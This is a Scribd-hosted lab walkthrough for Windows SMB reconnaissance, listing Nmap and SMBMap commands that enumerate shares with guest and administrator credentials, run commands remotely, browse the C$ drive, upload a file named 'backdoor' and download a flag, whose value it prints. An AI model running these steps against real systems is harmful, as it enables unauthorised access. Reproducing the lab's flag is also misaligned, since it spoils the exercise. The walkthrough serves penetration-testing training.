Scribd
Upload
19 views7 pages

Flag Hunt Using Smbmap

This document outlines the steps for conducting Windows reconnaissance using the SMBMap tool, including checking the target IP, running Nmap scans, and enumerating shared folders. It provides specific commands for accessing the SMB server with both guest and administrator credentials, as well as instructions for uploading and downloading files. The document concludes with the retrieval of a flag from the target machine.

Uploaded by

hackeronekamil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
19 views7 pages

Flag Hunt Using Smbmap

This document outlines the steps for conducting Windows reconnaissance using the SMBMap tool, including checking the target IP, running Nmap scans, and enumerating shared folders. It provides specific commands for accessing the SMB server with both guest and administrator credentials, as well as instructions for uploading and downloading files. The document concludes with the retrieval of a flag from the target machine.

Uploaded by

hackeronekamil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Name Windows Recon: SMB: SMBMap

URL [Link]

Type Windows Reconnaissance: SMB

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Checking the target IP address.

Note: ​The target IP address is stored in the “target” file.

Command: ​cat /root/Desktop/target

Step 2:​ Run a Nmap scan against the target IP.

Command: ​nmap [Link]


Step 3: ​We have discovered that multiple ports are open. SMB port 445 is also exposed. We
will run Nmap script to list the supported protocols and dialects of an SMB server.

Command:​ nmap -p445 --script smb-protocols [Link]

We have the credentials to access the SMB server. i.e ​administrator:smbserver_771

We will use the smbmap python script to enumerate the target machine.
Step 4: ​Running smbmap tool to discover all shared folders and drives.

We will find all the shared folders using a guest user account.

Command: ​smbmap -u guest -p "" -d . -H [Link]

We can notice that the guest account is enabled and it doesn’t have permission to write on any
of the shared folders.

Running smbmap with administrator user credentials.

Command: ​smbmap -u administrator -p smbserver_771 -d . -H [Link]

We can notice that we have found all the shares along with their permissions and the
comments.
Step 5: ​Execute the command on the target machine through SMB.

Command: ​smbmap -H [Link] -u administrator -p smbserver_771 -x 'ipconfig'

We can execute the commands on the target machine without any issue. You can abuse this
and gain a normal or meterpreter shell. In this lab, we will be focusing on enumeration using
smbmap, without gaining the shell.

Step 6: ​Listing all drives on the specified host

Command: ​smbmap -H [Link] -u Administrator -p 'smbserver_771' -L

Step 7: ​List contents of the directory of ​C:\ ​drive.

Command:​ smbmap -H [Link] -u Administrator -p 'smbserver_771' -r 'C$'


We have found all the files and directories which are present inside C:\ drive.

We can also upload a file using the smbmap tool if we have the write permission on the shared
folder.

Step 8: ​Uploading a sample file

Commands: ​touch backdoor


smbmap -H [Link] -u Administrator -p 'smbserver_771' --upload '/root/backdoor'
'C$\backdoor'

Verify that the files have been uploaded on the target machine.

Command: ​smbmap -H [Link] -u Administrator -p 'smbserver_771' -r 'C$'


We have successfully uploaded the file.

Step 9: ​Download the [Link] file.

Commands: ​smbmap -H [Link] -u Administrator -p 'smbserver_771' --download


'C$\[Link]'
cat /root/[Link]-C_flag.txt

This reveals the flag to us.

Flag: ​25f492dbef8453cdca69a173a75790f0

References:

1. SMBMap (​[Link]

You might also like